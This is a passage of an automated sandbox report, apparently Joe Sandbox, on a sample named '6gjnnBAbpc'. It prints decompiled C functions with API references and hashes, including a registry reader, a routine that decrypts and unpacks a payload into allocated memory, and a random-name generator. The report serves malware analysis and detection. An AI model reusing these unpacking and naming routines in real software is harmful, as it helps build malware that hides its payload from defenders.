                                                                                                                                                                                                                                                                                                        0x0400830d
                                                                                                                                                                                                                                                                                                        0x04008318
                                                                                                                                                                                                                                                                                                        0x0400832e
                                                                                                                                                                                                                                                                                                        0x04008333
                                                                                                                                                                                                                                                                                                        0x04008336
                                                                                                                                                                                                                                                                                                        0x0400833d
                                                                                                                                                                                                                                                                                                        0x0400833f
                                                                                                                                                                                                                                                                                                        0x04008346
                                                                                                                                                                                                                                                                                                        0x04008346
                                                                                                                                                                                                                                                                                                        0x0400834f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400835a
                                                                                                                                                                                                                                                                                                        0x0400830d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040082e5
                                                                                                                                                                                                                                                                                                        0x04008296
                                                                                                                                                                                                                                                                                                        0x0400835f
                                                                                                                                                                                                                                                                                                        0x04008365

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000004,-->), ref: 04008300
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                        • String ID: -->$<!--
                                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                                                        • Opcode ID: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 33a7bc7995a4c535701f75233fb1c46eed47e0fb0959c3fa2371b97aa1c284c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23311971900249DFEF04EFA8C544BEEBBB1BB88308F14C959D505B7281E774AA84CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E0400A400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                                                                                                                        				long _t27;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                                        					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                                                                                                                                        					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                                                        					if(_t25 == 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = _a16;
                                                                                                                                                                                                                                                                                                        						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        						if(_t27 == 0) {
                                                                                                                                                                                                                                                                                                        							_v8 = _v20;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x0400a406
                                                                                                                                                                                                                                                                                                        0x0400a411
                                                                                                                                                                                                                                                                                                        0x0400a429
                                                                                                                                                                                                                                                                                                        0x0400a439
                                                                                                                                                                                                                                                                                                        0x0400a43b
                                                                                                                                                                                                                                                                                                        0x0400a43b
                                                                                                                                                                                                                                                                                                        0x0400a442
                                                                                                                                                                                                                                                                                                        0x0400a45c
                                                                                                                                                                                                                                                                                                        0x0400a464
                                                                                                                                                                                                                                                                                                        0x0400a469
                                                                                                                                                                                                                                                                                                        0x0400a480
                                                                                                                                                                                                                                                                                                        0x0400a488
                                                                                                                                                                                                                                                                                                        0x0400a48d
                                                                                                                                                                                                                                                                                                        0x0400a48d
                                                                                                                                                                                                                                                                                                        0x0400a494
                                                                                                                                                                                                                                                                                                        0x0400a494
                                                                                                                                                                                                                                                                                                        0x0400a464
                                                                                                                                                                                                                                                                                                        0x0400a4a0

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                                                        • Instruction ID: 715db8aa4ed00a9f1925e7802d1785fb3623660146ed6b0049a8ef53f9c2d8f0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70110D74A00309EBEB15CF94C848BEF77B8FB84744F14C558E914AB680D7B8AA51CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0040EBE0: GetAtomNameA.KERNEL32(?,?,0040DB50), ref: 0040EC03
                                                                                                                                                                                                                                                                                                        • free.MSVCRT ref: 0040EDA2
                                                                                                                                                                                                                                                                                                        • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040EDAD
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32 ref: 0040EDB9
                                                                                                                                                                                                                                                                                                        • memset.NTDLL ref: 0040EDFC
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomChangeCloseFindMutexNameNotificationReleasefreememset
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 342251636-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 44162ba2f567e4785b2b797dfd594cafc1bf0faf778d2d143437323698a3bf36
                                                                                                                                                                                                                                                                                                        • Instruction ID: e0ba675913fac37eea7b8a293b535138c2be36a3a1ced07d229613690e4f81d1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44162ba2f567e4785b2b797dfd594cafc1bf0faf778d2d143437323698a3bf36
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61F01C76A045158BCB10BF6698840BDF7F1FE44314B454C7EE996A3350D738A426CBD6
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04008090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                        				int _v48;
                                                                                                                                                                                                                                                                                                        				long _v52;
                                                                                                                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v16 = _a8;
                                                                                                                                                                                                                                                                                                        					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t71;
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_t73 = E04001390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                                                        						_v20 = _t73;
                                                                                                                                                                                                                                                                                                        						if(_v20 != 0) {
                                                                                                                                                                                                                                                                                                        							_v24 = _v12;
                                                                                                                                                                                                                                                                                                        							_v28 = _v20;
                                                                                                                                                                                                                                                                                                        							_v32 = E040087B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                                                        								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                                                        								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                                                        								_v36 = E040016F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                                                        								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                                                        									E04008630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                                                        									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                                                        									E04008630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                                                        									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                                                                        									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                                        									_t91 = E04008A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x4013410, 0x254); // executed
                                                                                                                                                                                                                                                                                                        									if(_t91 != 0) {
                                                                                                                                                                                                                                                                                                        										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        										 *_a12 = _t93;
                                                                                                                                                                                                                                                                                                        										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                                                        											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                                        											E04007B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                                                        											 *_a16 = _v52;
                                                                                                                                                                                                                                                                                                        											_v8 = _v52;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_v8 == 0) {
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x04008096
                                                                                                                                                                                                                                                                                                        0x040080a1
                                                                                                                                                                                                                                                                                                        0x04008246
                                                                                                                                                                                                                                                                                                        0x0400824c
                                                                                                                                                                                                                                                                                                        0x040080c5
                                                                                                                                                                                                                                                                                                        0x040080c8
                                                                                                                                                                                                                                                                                                        0x040080d8
                                                                                                                                                                                                                                                                                                        0x040080de
                                                                                                                                                                                                                                                                                                        0x040080e5
                                                                                                                                                                                                                                                                                                        0x040080fb
                                                                                                                                                                                                                                                                                                        0x04008103
                                                                                                                                                                                                                                                                                                        0x0400810a
                                                                                                                                                                                                                                                                                                        0x04008113
                                                                                                                                                                                                                                                                                                        0x04008119
                                                                                                                                                                                                                                                                                                        0x0400812d
                                                                                                                                                                                                                                                                                                        0x04008134
                                                                                                                                                                                                                                                                                                        0x04008140
                                                                                                                                                                                                                                                                                                        0x04008149
                                                                                                                                                                                                                                                                                                        0x04008162
                                                                                                                                                                                                                                                                                                        0x0400816b
                                                                                                                                                                                                                                                                                                        0x0400817e
                                                                                                                                                                                                                                                                                                        0x0400818c
                                                                                                                                                                                                                                                                                                        0x0400819e
                                                                                                                                                                                                                                                                                                        0x040081b1
                                                                                                                                                                                                                                                                                                        0x040081d3
                                                                                                                                                                                                                                                                                                        0x040081d8
                                                                                                                                                                                                                                                                                                        0x040081e2
                                                                                                                                                                                                                                                                                                        0x040081f1
                                                                                                                                                                                                                                                                                                        0x040081fa
                                                                                                                                                                                                                                                                                                        0x04008202
                                                                                                                                                                                                                                                                                                        0x0400820e
                                                                                                                                                                                                                                                                                                        0x04008219
                                                                                                                                                                                                                                                                                                        0x04008227
                                                                                                                                                                                                                                                                                                        0x0400822c
                                                                                                                                                                                                                                                                                                        0x0400822c
                                                                                                                                                                                                                                                                                                        0x04008202
                                                                                                                                                                                                                                                                                                        0x040081e2
                                                                                                                                                                                                                                                                                                        0x0400816b
                                                                                                                                                                                                                                                                                                        0x04008134
                                                                                                                                                                                                                                                                                                        0x04008233
                                                                                                                                                                                                                                                                                                        0x04008240
                                                                                                                                                                                                                                                                                                        0x04008240
                                                                                                                                                                                                                                                                                                        0x04008233
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040080e5

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04008240
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 040081F1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 142027497-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 586cb0610e47de0410656fb7eac1ad2d30ffe64d38e300cd8a2e1f05076280ab
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3551E7B5E00209AFEB14DF98D984BEEB7B5BB48304F14C158E905BB381D774AA40CB61
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                                        			E04005930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                                                                                                                        				void _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                                                        					E04007B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                                                        					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                                                        					asm("movsw");
                                                                                                                                                                                                                                                                                                        					asm("movsb");
                                                                                                                                                                                                                                                                                                        					_v56 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                                                        						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                                                        						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                                                        						if(_v56 == 0) {
                                                                                                                                                                                                                                                                                                        							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x04005938
                                                                                                                                                                                                                                                                                                        0x04005943
                                                                                                                                                                                                                                                                                                        0x04005971
                                                                                                                                                                                                                                                                                                        0x04005986
                                                                                                                                                                                                                                                                                                        0x04005988
                                                                                                                                                                                                                                                                                                        0x0400598a
                                                                                                                                                                                                                                                                                                        0x0400598b
                                                                                                                                                                                                                                                                                                        0x0400599d
                                                                                                                                                                                                                                                                                                        0x040059c6
                                                                                                                                                                                                                                                                                                        0x040059d6
                                                                                                                                                                                                                                                                                                        0x040059dc
                                                                                                                                                                                                                                                                                                        0x040059e2
                                                                                                                                                                                                                                                                                                        0x040059e2
                                                                                                                                                                                                                                                                                                        0x040059ee
                                                                                                                                                                                                                                                                                                        0x0400599a
                                                                                                                                                                                                                                                                                                        0x0400599a
                                                                                                                                                                                                                                                                                                        0x0400599d
                                                                                                                                                                                                                                                                                                        0x040059fb

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • abcdefghijklmnopqrstuvwxyz, xrefs: 0400597E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CharUpper
                                                                                                                                                                                                                                                                                                        • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                                                        • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                                                        • Opcode ID: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                                                        • Instruction ID: f69ee34caa0c5af81cf691572c0dafb25cbc9a5132ff2a0986e08936ddab1125
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7210C35A06108EBEF04CF98D984BDDB7B6FF85315F248569E804A7280D375AA45CF41
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                                        			E0040D0C0(void* __ebx, signed int __edi, signed int __esi) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                                                                                                                                                        				char* _v56;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				void* _v61;
                                                                                                                                                                                                                                                                                                        				void* _v64;
                                                                                                                                                                                                                                                                                                        				char* _v80;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                                                                                                                                                        				signed int _v88;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                                                                                                                        				long _t76;
                                                                                                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                                                                        				signed char* _t87;
                                                                                                                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t94;
                                                                                                                                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                                                                                                        				signed short _t101;
                                                                                                                                                                                                                                                                                                        				signed char _t106;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t114;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t121;
                                                                                                                                                                                                                                                                                                        				signed int _t122;
                                                                                                                                                                                                                                                                                                        				signed int _t126;
                                                                                                                                                                                                                                                                                                        				int _t135;
                                                                                                                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                                                                                                                        				char** _t147;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t130 = __esi;
                                                                                                                                                                                                                                                                                                        				_t119 = __edi;
                                                                                                                                                                                                                                                                                                        				_t61 =  *0x42206c; // 0x1
                                                                                                                                                                                                                                                                                                        				if(_t61 == 0) {
                                                                                                                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                                                                                                                        					 *0x42206c = 1;
                                                                                                                                                                                                                                                                                                        					_t66 = E0040DB20(0x0000001e + (E0040D950() + _t62 * 0x00000002) * 0x00000004 & 0xfffffff0, __ebx);
                                                                                                                                                                                                                                                                                                        					 *0x422070 = 0;
                                                                                                                                                                                                                                                                                                        					_t147 = _t145 - 0x4c - _t66;
                                                                                                                                                                                                                                                                                                        					 *0x422074 =  &_v61 & 0xfffffff0;
                                                                                                                                                                                                                                                                                                        					_t70 = 0x18;
                                                                                                                                                                                                                                                                                                        					__eflags = 0x4219b4 - 7;
                                                                                                                                                                                                                                                                                                        					if(0x4219b4 <= 7) {
                                                                                                                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                                                                                                                        						return _t70;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__eflags = 0x4219b4 - 0xb;
                                                                                                                                                                                                                                                                                                        						if(0x4219b4 <= 0xb) {
                                                                                                                                                                                                                                                                                                        							_t93 = 0x42199c;
                                                                                                                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                                                                                                                        						} else {
